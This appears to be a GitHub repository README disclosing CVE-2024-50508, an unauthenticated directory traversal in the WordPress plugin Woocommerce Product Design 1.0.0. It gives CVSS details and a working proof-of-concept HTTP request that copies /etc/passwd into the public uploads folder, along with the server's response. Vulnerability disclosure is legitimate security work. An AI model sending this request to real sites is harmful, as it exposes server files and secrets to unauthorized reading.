Skip to content
/ CVE-2024-50508 Public

Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Download

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

RandomRobbieBF/CVE-2024-50508

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2024-50508

Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Download

Description

The Woocommerce Product Design plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.

Details

  • Type: plugin
  • Slug: woo-product-design
  • Affected Version: 1.0.0
  • CVSS Score: 7.5
  • CVSS Rating: High
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2024-50508
  • Status: Closed

POC

POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

action=pc_added_uploaded_image&file[path]=/etc/passwd

{
  "path": "/var/www/html/wp-content/uploads/wcpc/images/uploaded_images/passwd",
  "message": "Image Uploaded Successfully",
  "url": "https://wp-dev.ddev.site/wp-content/uploads/wcpc/images/uploaded_images/passwd",
  "status": "success"
}

About

Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Download

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published